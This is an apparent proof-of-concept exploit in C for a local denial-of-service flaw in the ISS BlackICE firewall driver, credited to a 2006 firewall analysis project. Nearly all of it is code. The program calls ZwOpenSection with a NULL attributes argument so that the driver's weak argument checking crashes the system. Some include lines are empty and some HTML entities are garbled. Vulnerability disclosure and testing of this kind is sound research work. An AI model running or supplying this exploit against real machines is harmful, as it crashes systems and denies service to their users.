ISS BlackICE NtOpenSection()本地拒绝服务漏洞

                                                /*

Testing program for Insufficient validation of arguments of NtOpenSection (BTP00000P003BI)Usage:
prog FUNCNAME
FUNCNAME - name of function to be checked

Description:
This program calls given function with parameters that cause the crash of the system. This happens because of
insufficient check of function arguments in the driver of the firewall.

Test:
Running the testing program with the name of function from the list of functions with insufficient check
of arguments.

*/

#undef __STRICT_ANSI__
#include
#include
#include
#include
#include

void about(void)
{
printf("Testing program for Insufficient validation of arguments of NtOpenSection (BTP00000P003BI)\n");
printf("Windows Personal Firewall analysis project\n");
printf("Copyright 2006 by Matousec - Transparent security\n");
printf("http://www.matousec.com/\n\n");
return;
}

void usage(void)
{
printf("Usage: test FUNCNAME\n"
" FUNCNAME - name of function to be checked\n");
return;
}

void print_last_error()
{
LPTSTR buf;
DWORD code=GetLastError();
if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)%26amp;buf,0,NULL))
{
fprintf(stderr,"Error code: %d\n",code);
fprintf(stderr,"Error message: %s",buf);
LocalFree(buf);
} else fprintf(stderr,"Unable to format error message for code %d.\n",code);
return;
}int main(int argc,char **argv)
{
about();

if (argc!=2)
{
usage();
return 1;
}

if (!stricmp(argv[1],"NtOpenSection") || !stricmp(argv[1],"ZwOpenSection"))
{
HANDLE handle;
ZwOpenSection(%26amp;handle,SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE,NULL);
} else printf("\nI do not know how to exploit the vulnerability using this function.\n");

printf("\nTEST FAILED!\n");
return 1;
}